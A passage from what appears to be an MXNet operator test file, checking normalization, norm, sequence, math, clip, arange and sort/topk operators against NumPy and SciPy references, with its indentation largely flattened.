exec1 = Y._bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_device())
check_instance_norm_with_shape((2, 1, 2), default_device())
check_instance_norm_with_shape((2,4,5,6), default_device())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_device())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_device()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out._simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
    assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
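    # Gradient formulas implemented by npy_layer_norm_grad, written out for reference: with
    # xhat = (x - mean) / std and w = out_grad * gamma / std (broadcast along `axis`),
    #   d_beta  = sum(out_grad)            over all axes except `axis`
    #   d_gamma = sum(out_grad * xhat)     over all axes except `axis`
    #   d_x     = w - mean_axis(w) - xhat * mean_axis(w * xhat)
    # which is the standard layer-norm backward when mean and variance are treated as functions
    # of the input.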
ctx = default_device()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s._simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s._simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_device()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
for enforce_safe_acc in ['1', '0']:
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
                            npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
                            npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
                                npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
                                npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
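# All three NumPy references above first move the sequence axis to position 1 so the data is
# laid out as [batch, seqlen, ...], apply the per-row operation using the (possibly None)
# lengths, and move the axis back. For example, with lengths = [1, 3] on a seqlen-3 batch,
# sequence_reverse_numpy leaves row 0 untouched (only its first element is "valid") and fully
# reverses row 1, while sequence_mask_numpy would overwrite positions 1 and 2 of row 0 with the
# fill value and leave row 1 alone.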
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_device()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@pytest.mark.skip(reason="Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test._bind(default_device(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test._bind(default_device(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
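# Typical usage of the two helpers above (illustrative only; the concrete call sites live in
# test_mathematical and test_special_functions_using_scipy below):
#   mathematical_core("log", lambda x: mx.sym.log(x), np.log, lambda x: 1. / x, 0.5, 0.5)
# checks both the forward value and the analytic derivative of a unary op at data_init=0.5 with
# an incoming gradient of 0.5, while mathematical_core_binary does the same for a binary op with
# one derivative callback per argument.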
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
    except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test._bind(default_device(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x._bind(default_device(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s._bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
def test_order():
ctx = default_device()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
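    # gt_topk in a nutshell (tiny illustrative example, not an extra test case): for
    # dat = [1, 3, 2] with axis=0, k=2 and is_ascend=False, ret_typ="indices" gives [1, 2]
    # (positions of 3 and 2, largest first), ret_typ="value" gives [3, 2], and ret_typ="mask"
    # (only exercised on the (5, 5, 5, 5) input below) marks the selected positions with 1.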
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
